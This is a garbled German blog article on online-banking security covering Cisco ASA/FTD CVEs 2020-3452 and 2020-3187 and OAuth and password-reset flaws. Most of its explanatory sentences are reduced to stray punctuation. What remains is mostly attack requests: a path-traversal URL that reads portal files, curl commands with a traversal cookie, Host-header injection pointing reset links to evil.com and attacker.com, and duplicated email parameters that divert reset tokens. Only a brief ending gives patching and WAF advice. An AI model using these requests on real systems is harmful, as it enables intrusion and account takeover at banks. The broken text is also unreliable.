Clever Geek Handbook

Sicherheitsfragen beim Online-Banking

Hallo Freunde!





Heute werden wir über die dringenden Probleme der Sicherheit von Bankensystemen sprechen, gemeinsame Schwachstellen analysieren und aus aktuellen Problemen Schlussfolgerungen ziehen.





Wichtig

Auch hier garantiert der Autor nicht, Ihnen zu zeigen, wie Sie Ihr System vollständig vor Cyber-Bedrohungen schützen können, sondern möchte nur zeigen, auf welche Probleme Sie Ihre Aufmerksamkeit richten sollten.





1. SSL VPN-Dienste

Banken verwenden sehr häufig Cisco SSL VPN-Dienste, um den Remotezugriff auf ihr internes Netzwerk zu organisieren





, .. Cisco CVE-2020-3452 CVE-2020-3187





1.1. CVE-2020-3452

CVE-2020-3452 - Cisco ASA FTD. , , , HTTP- .









https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../









, .





1.2. CVE-2020-3187





/session_password.html 200





curl -k -s -i https://



Cisco-VPN/+CSCOE+/session_password.html







200? -





"/+CSCOU+/csco_logo.gif"







curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://



Cisco-VPN/+CSCOE+/session_password.html







VPN .





2. & OAuth

- (SSO) OAuth 2.0, , , .





GET /auth/sso/cb?code=[sso token account] HTTP/1.1

Host: bank.com

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close









CSRF . - .





  1. SSO





  2. SSO ,





  3. .





  4. SSO .





redirect_uri - url . / .









POST https://bank.com/reset.php HTTP/1.1

Accept: /

Content-Type: application/json

Host: evil.com











Host: bank.com

X-Forwarded-Host: attacker.com











Host: target.com

Host: attacker.com







email .









https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901





- . , .





.





POST /resetPassword

[…]

email=victim@email.com&email=attacker@email.com







In der Anfrage sehen Sie, dass der Angreifer einfach den E-Mail-Parameter dupliziert und seine E-Mail angegeben hat, an die das Autorisierungstoken gesendet wird.





Ausgabe

Halten Sie Ihre Dienste auf dem neuesten Stand, sei es SSL VPN oder GlobalProtect.





Halten Sie die Authentifizierung sicher





Verwenden Sie auch als Tipp eine Web Application Firewall (  WAF  ), um die Ausnutzung von Sicherheitslücken zu verhindern, die durch Codeänderungen verursacht werden.





Viel Glück! Alles Gute.







More articles:


All Articles